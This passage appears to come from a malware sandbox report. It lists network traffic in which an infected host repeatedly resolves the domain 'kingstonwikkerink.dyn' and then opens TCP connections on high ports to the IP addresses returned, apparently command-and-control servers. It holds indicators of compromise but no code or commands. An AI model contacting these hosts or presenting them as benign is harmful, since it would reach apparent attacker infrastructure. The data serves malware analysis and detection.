Oct 26, 2024 19:12:58.642724037 CEST	36488	6718	192.168.2.23	185.82.200.181
Oct 26, 2024 19:12:58.648135900 CEST	6718	36488	185.82.200.181	192.168.2.23
Oct 26, 2024 19:13:01.400289059 CEST	43928	443	192.168.2.23	91.189.91.42
Oct 26, 2024 19:13:08.665370941 CEST	42080	7830	192.168.2.23	88.151.195.22
Oct 26, 2024 19:13:08.670902014 CEST	7830	42080	88.151.195.22	192.168.2.23
Oct 26, 2024 19:13:08.670991898 CEST	42080	7830	192.168.2.23	88.151.195.22
Oct 26, 2024 19:13:08.671036005 CEST	42080	7830	192.168.2.23	88.151.195.22
Oct 26, 2024 19:13:08.676415920 CEST	7830	42080	88.151.195.22	192.168.2.23
Oct 26, 2024 19:13:08.676487923 CEST	42080	7830	192.168.2.23	88.151.195.22
Oct 26, 2024 19:13:08.681988001 CEST	7830	42080	88.151.195.22	192.168.2.23
Oct 26, 2024 19:13:09.636486053 CEST	7830	42080	88.151.195.22	192.168.2.23
Oct 26, 2024 19:13:09.636662006 CEST	42080	7830	192.168.2.23	88.151.195.22
Oct 26, 2024 19:13:09.636709929 CEST	42080	7830	192.168.2.23	88.151.195.22
Oct 26, 2024 19:13:21.877448082 CEST	42836	443	192.168.2.23	91.189.91.43
Oct 26, 2024 19:13:24.663116932 CEST	49520	13529	192.168.2.23	91.149.238.18
Oct 26, 2024 19:13:24.668612957 CEST	13529	49520	91.149.238.18	192.168.2.23
Oct 26, 2024 19:13:24.668772936 CEST	49520	13529	192.168.2.23	91.149.238.18
Oct 26, 2024 19:13:24.668773890 CEST	49520	13529	192.168.2.23	91.149.238.18
Oct 26, 2024 19:13:24.674588919 CEST	13529	49520	91.149.238.18	192.168.2.23
Oct 26, 2024 19:13:24.674671888 CEST	49520	13529	192.168.2.23	91.149.238.18
Oct 26, 2024 19:13:24.679994106 CEST	13529	49520	91.149.238.18	192.168.2.23
Oct 26, 2024 19:13:25.508610010 CEST	13529	49520	91.149.238.18	192.168.2.23
Oct 26, 2024 19:13:25.508675098 CEST	13529	49520	91.149.238.18	192.168.2.23
Oct 26, 2024 19:13:25.508960962 CEST	49520	13529	192.168.2.23	91.149.238.18
Oct 26, 2024 19:13:25.508961916 CEST	49520	13529	192.168.2.23	91.149.238.18
Oct 26, 2024 19:13:25.509015083 CEST	49520	13529	192.168.2.23	91.149.238.18
Oct 26, 2024 19:13:35.530158043 CEST	55186	22472	192.168.2.23	31.13.248.89
Oct 26, 2024 19:13:35.535531044 CEST	22472	55186	31.13.248.89	192.168.2.23
Oct 26, 2024 19:13:35.535650969 CEST	55186	22472	192.168.2.23	31.13.248.89
Oct 26, 2024 19:13:35.535693884 CEST	55186	22472	192.168.2.23	31.13.248.89
Oct 26, 2024 19:13:35.541138887 CEST	22472	55186	31.13.248.89	192.168.2.23
Oct 26, 2024 19:13:35.541229963 CEST	55186	22472	192.168.2.23	31.13.248.89
Oct 26, 2024 19:13:35.546772003 CEST	22472	55186	31.13.248.89	192.168.2.23
Oct 26, 2024 19:13:36.165191889 CEST	22472	55186	31.13.248.89	192.168.2.23
Oct 26, 2024 19:13:36.165462971 CEST	55186	22472	192.168.2.23	31.13.248.89
Oct 26, 2024 19:13:36.171046972 CEST	22472	55186	31.13.248.89	192.168.2.23
Oct 26, 2024 19:13:41.179286957 CEST	60766	7362	192.168.2.23	81.29.149.178
Oct 26, 2024 19:13:41.185118914 CEST	7362	60766	81.29.149.178	192.168.2.23
Oct 26, 2024 19:13:41.185286999 CEST	60766	7362	192.168.2.23	81.29.149.178
Oct 26, 2024 19:13:41.185305119 CEST	60766	7362	192.168.2.23	81.29.149.178
Oct 26, 2024 19:13:41.190800905 CEST	7362	60766	81.29.149.178	192.168.2.23
Oct 26, 2024 19:13:41.190859079 CEST	60766	7362	192.168.2.23	81.29.149.178
Oct 26, 2024 19:13:41.196227074 CEST	7362	60766	81.29.149.178	192.168.2.23
Oct 26, 2024 19:13:42.076397896 CEST	7362	60766	81.29.149.178	192.168.2.23
Oct 26, 2024 19:13:42.076592922 CEST	60766	7362	192.168.2.23	81.29.149.178
Oct 26, 2024 19:13:42.076730013 CEST	60766	7362	192.168.2.23	81.29.149.178
Oct 26, 2024 19:13:47.114227057 CEST	45692	6999	192.168.2.23	81.29.149.178
Oct 26, 2024 19:13:47.119693995 CEST	6999	45692	81.29.149.178	192.168.2.23
Oct 26, 2024 19:13:47.119803905 CEST	45692	6999	192.168.2.23	81.29.149.178
Oct 26, 2024 19:13:47.119853973 CEST	45692	6999	192.168.2.23	81.29.149.178
Oct 26, 2024 19:13:47.125211000 CEST	6999	45692	81.29.149.178	192.168.2.23
Oct 26, 2024 19:13:47.125296116 CEST	45692	6999	192.168.2.23	81.29.149.178
Oct 26, 2024 19:13:47.130743980 CEST	6999	45692	81.29.149.178	192.168.2.23
Oct 26, 2024 19:13:48.022017956 CEST	6999	45692	81.29.149.178	192.168.2.23
Oct 26, 2024 19:13:48.022085905 CEST	6999	45692	81.29.149.178	192.168.2.23
Oct 26, 2024 19:13:48.022131920 CEST	6999	45692	81.29.149.178	192.168.2.23
Oct 26, 2024 19:13:48.022183895 CEST	45692	6999	192.168.2.23	81.29.149.178
Oct 26, 2024 19:13:48.022183895 CEST	45692	6999	192.168.2.23	81.29.149.178
Oct 26, 2024 19:13:48.022183895 CEST	45692	6999	192.168.2.23	81.29.149.178
Oct 26, 2024 19:13:48.022278070 CEST	45692	6999	192.168.2.23	81.29.149.178
Oct 26, 2024 19:13:58.042923927 CEST	42280	14623	192.168.2.23	193.233.193.45
Oct 26, 2024 19:13:58.048311949 CEST	14623	42280	193.233.193.45	192.168.2.23
Oct 26, 2024 19:13:58.048475981 CEST	42280	14623	192.168.2.23	193.233.193.45
Oct 26, 2024 19:13:58.048475981 CEST	42280	14623	192.168.2.23	193.233.193.45
Oct 26, 2024 19:13:58.054095030 CEST	14623	42280	193.233.193.45	192.168.2.23
Oct 26, 2024 19:13:58.054191113 CEST	42280	14623	192.168.2.23	193.233.193.45
Oct 26, 2024 19:13:58.059779882 CEST	14623	42280	193.233.193.45	192.168.2.23
Oct 26, 2024 19:13:59.435455084 CEST	14623	42280	193.233.193.45	192.168.2.23
Oct 26, 2024 19:13:59.435729027 CEST	42280	14623	192.168.2.23	193.233.193.45
Oct 26, 2024 19:13:59.435909033 CEST	42280	14623	192.168.2.23	193.233.193.45
Oct 26, 2024 19:14:04.760798931 CEST	34672	7869	192.168.2.23	81.29.149.178
Oct 26, 2024 19:14:04.766289949 CEST	7869	34672	81.29.149.178	192.168.2.23
Oct 26, 2024 19:14:04.766370058 CEST	34672	7869	192.168.2.23	81.29.149.178
Oct 26, 2024 19:14:04.766433954 CEST	34672	7869	192.168.2.23	81.29.149.178
Oct 26, 2024 19:14:04.771852970 CEST	7869	34672	81.29.149.178	192.168.2.23
Oct 26, 2024 19:14:04.771924019 CEST	34672	7869	192.168.2.23	81.29.149.178
Oct 26, 2024 19:14:04.777302027 CEST	7869	34672	81.29.149.178	192.168.2.23
Oct 26, 2024 19:14:05.690093040 CEST	7869	34672	81.29.149.178	192.168.2.23
Oct 26, 2024 19:14:05.690259933 CEST	7869	34672	81.29.149.178	192.168.2.23
Oct 26, 2024 19:14:05.690440893 CEST	34672	7869	192.168.2.23	81.29.149.178
Oct 26, 2024 19:14:05.690440893 CEST	34672	7869	192.168.2.23	81.29.149.178
Oct 26, 2024 19:14:05.690521002 CEST	34672	7869	192.168.2.23	81.29.149.178

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 19:12:00.390312910 CEST	35119	53	192.168.2.23	70.34.254.19
Oct 26, 2024 19:12:00.499921083 CEST	40649	53	192.168.2.23	70.34.254.19
Oct 26, 2024 19:12:05.396600008 CEST	47123	53	192.168.2.23	70.34.254.19
Oct 26, 2024 19:12:05.507791996 CEST	34068	53	192.168.2.23	70.34.254.19
Oct 26, 2024 19:12:10.402713060 CEST	58756	53	192.168.2.23	139.84.165.176
Oct 26, 2024 19:12:10.513477087 CEST	52309	53	192.168.2.23	139.84.165.176
Oct 26, 2024 19:12:15.411674976 CEST	38490	53	192.168.2.23	51.158.108.203
Oct 26, 2024 19:12:15.428292990 CEST	53	38490	51.158.108.203	192.168.2.23
Oct 26, 2024 19:12:15.520190954 CEST	35562	53	192.168.2.23	51.158.108.203
Oct 26, 2024 19:12:15.536366940 CEST	53	35562	51.158.108.203	192.168.2.23
Oct 26, 2024 19:12:21.400528908 CEST	34230	53	192.168.2.23	139.84.165.176
Oct 26, 2024 19:12:26.407067060 CEST	45121	53	192.168.2.23	5.161.109.23
Oct 26, 2024 19:12:31.412925959 CEST	32929	53	192.168.2.23	217.160.70.42
Oct 26, 2024 19:12:31.441342115 CEST	53	32929	217.160.70.42	192.168.2.23
Oct 26, 2024 19:12:37.279942036 CEST	50767	53	192.168.2.23	217.160.70.42
Oct 26, 2024 19:12:37.307766914 CEST	53	50767	217.160.70.42	192.168.2.23
Oct 26, 2024 19:12:43.224294901 CEST	37186	53	192.168.2.23	152.53.15.127
Oct 26, 2024 19:12:43.273986101 CEST	53	37186	152.53.15.127	192.168.2.23
Oct 26, 2024 19:12:49.985749006 CEST	34600	53	192.168.2.23	185.181.61.24
Oct 26, 2024 19:12:50.019938946 CEST	53	34600	185.181.61.24	192.168.2.23
Oct 26, 2024 19:12:55.919389009 CEST	47412	53	192.168.2.23	217.160.70.42
Oct 26, 2024 19:12:55.948388100 CEST	53	47412	217.160.70.42	192.168.2.23
Oct 26, 2024 19:13:03.646188021 CEST	45549	53	192.168.2.23	64.176.6.48
Oct 26, 2024 19:13:08.653162956 CEST	56553	53	192.168.2.23	194.36.144.87
Oct 26, 2024 19:13:08.664350986 CEST	53	56553	194.36.144.87	192.168.2.23
Oct 26, 2024 19:13:14.638951063 CEST	36710	53	192.168.2.23	139.84.165.176
Oct 26, 2024 19:13:19.644511938 CEST	42584	53	192.168.2.23	139.84.165.176
Oct 26, 2024 19:13:24.650511026 CEST	49599	53	192.168.2.23	152.53.15.127
Oct 26, 2024 19:13:24.662003994 CEST	53	49599	152.53.15.127	192.168.2.23
Oct 26, 2024 19:13:30.511476994 CEST	60443	53	192.168.2.23	64.176.6.48
Oct 26, 2024 19:13:35.518095970 CEST	44803	53	192.168.2.23	152.53.15.127
Oct 26, 2024 19:13:35.529244900 CEST	53	44803	152.53.15.127	192.168.2.23
Oct 26, 2024 19:13:41.167798042 CEST	52468	53	192.168.2.23	152.53.15.127
Oct 26, 2024 19:13:41.178767920 CEST	53	52468	152.53.15.127	192.168.2.23
Oct 26, 2024 19:13:47.079304934 CEST	43149	53	192.168.2.23	185.181.61.24
Oct 26, 2024 19:13:47.113255978 CEST	53	43149	185.181.61.24	192.168.2.23
Oct 26, 2024 19:13:53.027122021 CEST	48807	53	192.168.2.23	5.161.109.23
Oct 26, 2024 19:13:58.030843973 CEST	44132	53	192.168.2.23	202.61.197.122
Oct 26, 2024 19:13:58.041903973 CEST	53	44132	202.61.197.122	192.168.2.23
Oct 26, 2024 19:14:04.439070940 CEST	35307	53	192.168.2.23	80.152.203.134
Oct 26, 2024 19:14:04.759337902 CEST	53	35307	80.152.203.134	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 26, 2024 19:12:00.390312910 CEST	192.168.2.23	70.34.254.19	0xfe32	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:05.396600008 CEST	192.168.2.23	70.34.254.19	0xc61f	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:10.402713060 CEST	192.168.2.23	139.84.165.176	0x9193	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:15.411674976 CEST	192.168.2.23	51.158.108.203	0xbd4	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:21.400528908 CEST	192.168.2.23	139.84.165.176	0x2c67	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:26.407067060 CEST	192.168.2.23	5.161.109.23	0xead1	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:31.412925959 CEST	192.168.2.23	217.160.70.42	0x63cf	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:37.279942036 CEST	192.168.2.23	217.160.70.42	0x25cc	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:43.224294901 CEST	192.168.2.23	152.53.15.127	0x8290	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:49.985749006 CEST	192.168.2.23	185.181.61.24	0xbb96	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:55.919389009 CEST	192.168.2.23	217.160.70.42	0x9df7	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:03.646188021 CEST	192.168.2.23	64.176.6.48	0x4b50	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:08.653162956 CEST	192.168.2.23	194.36.144.87	0xb244	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:14.638951063 CEST	192.168.2.23	139.84.165.176	0xc0f4	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:19.644511938 CEST	192.168.2.23	139.84.165.176	0xb0d2	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:24.650511026 CEST	192.168.2.23	152.53.15.127	0x54fa	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:30.511476994 CEST	192.168.2.23	64.176.6.48	0x1d4a	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:35.518095970 CEST	192.168.2.23	152.53.15.127	0x51b	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:41.167798042 CEST	192.168.2.23	152.53.15.127	0x1adb	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:47.079304934 CEST	192.168.2.23	185.181.61.24	0xf866	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:53.027122021 CEST	192.168.2.23	5.161.109.23	0xa25c	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:58.030843973 CEST	192.168.2.23	202.61.197.122	0x6ac	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:14:04.439070940 CEST	192.168.2.23	80.152.203.134	0x92a9	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 26, 2024 19:12:15.428292990 CEST	51.158.108.203	192.168.2.23	0xbd4	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:15.428292990 CEST	51.158.108.203	192.168.2.23	0xbd4	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:15.428292990 CEST	51.158.108.203	192.168.2.23	0xbd4	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:15.428292990 CEST	51.158.108.203	192.168.2.23	0xbd4	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:15.428292990 CEST	51.158.108.203	192.168.2.23	0xbd4	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:15.428292990 CEST	51.158.108.203	192.168.2.23	0xbd4	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:15.428292990 CEST	51.158.108.203	192.168.2.23	0xbd4	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:15.428292990 CEST	51.158.108.203	192.168.2.23	0xbd4	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:15.428292990 CEST	51.158.108.203	192.168.2.23	0xbd4	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:15.428292990 CEST	51.158.108.203	192.168.2.23	0xbd4	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:15.428292990 CEST	51.158.108.203	192.168.2.23	0xbd4	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:31.441342115 CEST	217.160.70.42	192.168.2.23	0x63cf	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:31.441342115 CEST	217.160.70.42	192.168.2.23	0x63cf	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:31.441342115 CEST	217.160.70.42	192.168.2.23	0x63cf	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:31.441342115 CEST	217.160.70.42	192.168.2.23	0x63cf	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:31.441342115 CEST	217.160.70.42	192.168.2.23	0x63cf	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:31.441342115 CEST	217.160.70.42	192.168.2.23	0x63cf	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:31.441342115 CEST	217.160.70.42	192.168.2.23	0x63cf	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:31.441342115 CEST	217.160.70.42	192.168.2.23	0x63cf	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:31.441342115 CEST	217.160.70.42	192.168.2.23	0x63cf	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:31.441342115 CEST	217.160.70.42	192.168.2.23	0x63cf	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:31.441342115 CEST	217.160.70.42	192.168.2.23	0x63cf	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:37.307766914 CEST	217.160.70.42	192.168.2.23	0x25cc	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:37.307766914 CEST	217.160.70.42	192.168.2.23	0x25cc	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:37.307766914 CEST	217.160.70.42	192.168.2.23	0x25cc	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:37.307766914 CEST	217.160.70.42	192.168.2.23	0x25cc	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:37.307766914 CEST	217.160.70.42	192.168.2.23	0x25cc	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:37.307766914 CEST	217.160.70.42	192.168.2.23	0x25cc	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:37.307766914 CEST	217.160.70.42	192.168.2.23	0x25cc	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:37.307766914 CEST	217.160.70.42	192.168.2.23	0x25cc	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:37.307766914 CEST	217.160.70.42	192.168.2.23	0x25cc	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:37.307766914 CEST	217.160.70.42	192.168.2.23	0x25cc	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:37.307766914 CEST	217.160.70.42	192.168.2.23	0x25cc	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:43.273986101 CEST	152.53.15.127	192.168.2.23	0x8290	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:43.273986101 CEST	152.53.15.127	192.168.2.23	0x8290	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:43.273986101 CEST	152.53.15.127	192.168.2.23	0x8290	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:43.273986101 CEST	152.53.15.127	192.168.2.23	0x8290	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:43.273986101 CEST	152.53.15.127	192.168.2.23	0x8290	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:43.273986101 CEST	152.53.15.127	192.168.2.23	0x8290	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:43.273986101 CEST	152.53.15.127	192.168.2.23	0x8290	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:43.273986101 CEST	152.53.15.127	192.168.2.23	0x8290	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:43.273986101 CEST	152.53.15.127	192.168.2.23	0x8290	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:43.273986101 CEST	152.53.15.127	192.168.2.23	0x8290	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:43.273986101 CEST	152.53.15.127	192.168.2.23	0x8290	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:50.019938946 CEST	185.181.61.24	192.168.2.23	0xbb96	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:50.019938946 CEST	185.181.61.24	192.168.2.23	0xbb96	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:50.019938946 CEST	185.181.61.24	192.168.2.23	0xbb96	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:50.019938946 CEST	185.181.61.24	192.168.2.23	0xbb96	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:50.019938946 CEST	185.181.61.24	192.168.2.23	0xbb96	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:50.019938946 CEST	185.181.61.24	192.168.2.23	0xbb96	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:50.019938946 CEST	185.181.61.24	192.168.2.23	0xbb96	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:50.019938946 CEST	185.181.61.24	192.168.2.23	0xbb96	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:50.019938946 CEST	185.181.61.24	192.168.2.23	0xbb96	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:50.019938946 CEST	185.181.61.24	192.168.2.23	0xbb96	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:50.019938946 CEST	185.181.61.24	192.168.2.23	0xbb96	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:55.948388100 CEST	217.160.70.42	192.168.2.23	0x9df7	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:55.948388100 CEST	217.160.70.42	192.168.2.23	0x9df7	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:55.948388100 CEST	217.160.70.42	192.168.2.23	0x9df7	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:55.948388100 CEST	217.160.70.42	192.168.2.23	0x9df7	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:55.948388100 CEST	217.160.70.42	192.168.2.23	0x9df7	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:55.948388100 CEST	217.160.70.42	192.168.2.23	0x9df7	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:55.948388100 CEST	217.160.70.42	192.168.2.23	0x9df7	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:55.948388100 CEST	217.160.70.42	192.168.2.23	0x9df7	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:55.948388100 CEST	217.160.70.42	192.168.2.23	0x9df7	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:55.948388100 CEST	217.160.70.42	192.168.2.23	0x9df7	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:12:55.948388100 CEST	217.160.70.42	192.168.2.23	0x9df7	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:08.664350986 CEST	194.36.144.87	192.168.2.23	0xb244	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:08.664350986 CEST	194.36.144.87	192.168.2.23	0xb244	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:08.664350986 CEST	194.36.144.87	192.168.2.23	0xb244	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:08.664350986 CEST	194.36.144.87	192.168.2.23	0xb244	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:08.664350986 CEST	194.36.144.87	192.168.2.23	0xb244	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:08.664350986 CEST	194.36.144.87	192.168.2.23	0xb244	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:08.664350986 CEST	194.36.144.87	192.168.2.23	0xb244	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:08.664350986 CEST	194.36.144.87	192.168.2.23	0xb244	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:08.664350986 CEST	194.36.144.87	192.168.2.23	0xb244	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:08.664350986 CEST	194.36.144.87	192.168.2.23	0xb244	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:08.664350986 CEST	194.36.144.87	192.168.2.23	0xb244	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:24.662003994 CEST	152.53.15.127	192.168.2.23	0x54fa	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:24.662003994 CEST	152.53.15.127	192.168.2.23	0x54fa	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
